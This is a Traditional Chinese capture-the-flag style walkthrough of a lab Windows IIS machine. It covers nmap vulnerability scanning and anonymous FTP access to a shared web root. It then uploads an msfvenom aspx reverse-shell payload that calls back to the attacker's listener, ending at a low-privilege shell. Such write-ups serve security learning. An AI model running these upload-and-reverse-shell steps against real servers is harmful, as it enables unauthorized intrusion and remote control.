└──╼ [★]$ nmap -sV --script vuln 10.129.153.100 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 06:29 CDT Stats: 0:03:46 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.64% done; ETC: 06:33 (0:00:01 remaining) Nmap scan report for 10.129.153.100 Host is up (0.077s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 7.5 | vulners: | cpe:/a:microsoft:internet_information_services:7.5: | PACKETSTORM:180580 10.0 https://vulners.com/packetstorm/PACKETSTORM:180580 *EXPLOIT* | MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF- 10.0 https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF- *EXPLOIT* | CVE-2010-3972 10.0 https://vulners.com/cve/CVE-2010-3972 | SSV:20122 9.3 https://vulners.com/seebug/SSV:20122 *EXPLOIT* | CVE-2010-2730 9.3 https://vulners.com/cve/CVE-2010-2730 | SSV:20121 4.3 https://vulners.com/seebug/SSV:20121 *EXPLOIT* | PACKETSTORM:180584 4.3 https://vulners.com/packetstorm/PACKETSTORM:180584 *EXPLOIT* | MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS- 4.3 https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS- *EXPLOIT* | CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899 | EDB-ID:15803 0.0 https://vulners.com/exploitdb/EDB-ID:15803 *EXPLOIT* |_ EDB-ID:15167 0.0 https://vulners.com/exploitdb/EDB-ID:15167 *EXPLOIT* |_http-server-header: Microsoft-IIS/7.5 |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 263.50 seconds
他有開 ftp,我們可以用 anonymous 登入看到下面的資訊:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
ftp> ftp 10.129.153.100 Connected to 10.129.153.100. 220 Microsoft FTP Service Name (10.129.153.100:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 229 Entering Extended Passive Mode (|||49157|) 125 Data connection already open; Transfer starting. 03-18-17 01:06AM <DIR> aspnet_client 03-17-17 04:37PM 689 iisstart.htm 03-17-17 04:37PM 184946 welcome.png 226 Transfer complete.
透過瀏覽器可以看到下面的畫面:
這表示了 FTP 跟 HTTP 伺服器共享同一個根目錄,這問題很大,因為我們可以透過上傳惡意的文件,然後透過 http 來觸發,例如說 reverse shell。 這邊會用到 metasploit 框架中的一個工具,可以用來生 payloads。 透過下面的指令我們可以看到 aspx 是支援的格式,同時從剛剛 FTP 的資訊我們可以看到他的目錄名稱應該是 ASP.NET 生成的,包括 iisstart.htm 是一個標準的 IIS(Internet Information Services) 的起始頁面,可以得知上面在運行 Microsoft IIS Web 的伺服器。根據上面的資訊我們會用 aspx 來生成我們的 reverse shell。
└──╼ [★]$ msfvenom -p windows/x64/shell/reverse_tcp -f aspx lhost=tun0 lport=4444 rhost=10.129.151.61 -o rshell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of aspx file: 3675 bytes Saved as: rshell.aspx
ftp> ftp 10.129.151.61 Connected to 10.129.151.61. 220 Microsoft FTP Service Name (10.129.151.61:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put rshell.aspx local: rshell.aspx remote: rshell.aspx 229 Entering Extended Passive Mode (|||49157|) 125 Data connection already open; Transfer starting. 100% |*************************************************************************************************| 3722 59.15 MiB/s --:-- ETA 226 Transfer complete. 3722 bytes sent in 00:00 (13.98 KiB/s) ftp> ls 229 Entering Extended Passive Mode (|||49158|) 125 Data connection already open; Transfer starting. 03-18-17 01:06AM <DIR> aspnet_client 03-17-17 04:37PM 689 iisstart.htm 10-28-24 01:39PM 3722 rshell.aspx 03-17-17 04:37PM 184946 welcome.png 226 Transfer complete. ftp>
結果上面那個 payload 好像行不通,我換成下面這個就成功了:
1 2 3 4 5 6 7
└──╼ [★]$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.63 LPORT=4444 -o rshell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of aspx file: 2719 bytes Saved as: rshell.aspx
然後瀏覽器訪問就觸發 reverse shell 了:
1 2 3 4 5 6 7
└──╼ [★]$ nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.63] from (UNKNOWN) [10.129.151.61] 49168 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
結果進去之後連 user flag 的權限都還沒有,然後也發現這台伺服器是 x86 難怪剛剛的第一次的 payload 不會過: